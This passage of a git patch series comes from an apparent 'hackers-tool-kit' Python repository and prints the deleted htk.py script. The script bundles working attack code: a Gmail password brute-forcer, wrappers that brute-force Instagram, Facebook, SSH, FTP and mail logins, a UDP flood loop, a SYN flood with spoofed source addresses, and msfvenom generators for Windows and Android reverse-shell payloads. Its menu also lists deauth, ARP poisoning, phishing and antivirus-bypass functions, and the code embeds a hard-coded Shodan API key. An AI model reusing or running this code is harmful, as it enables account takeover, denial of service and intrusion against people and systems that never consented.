pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + found = True +mainbanner() +main() From 5277c0a591536f85615932defbb1427609f1180b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 21:01:03 +0100 Subject: [PATCH 063/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index be2d9d4..ef06168 100644 --- a/README.md +++ b/README.md @@ -40,3 +40,5 @@ this is where i will try to put the most recent updates * added a connect option * added an about me option + +* changed some things in the myip and sysinfo options From 107643b3ea0998b4da2ee9464d61902044a2b3a7 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 05:35:20 +0100 Subject: [PATCH 064/214] Delete htk.py --- htk.py | 2079 -------------------------------------------------------- 1 file changed, 2079 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 517f493..0000000 --- a/htk.py +++ /dev/null @@ -1,2079 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arppois : ARP poisoning | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - 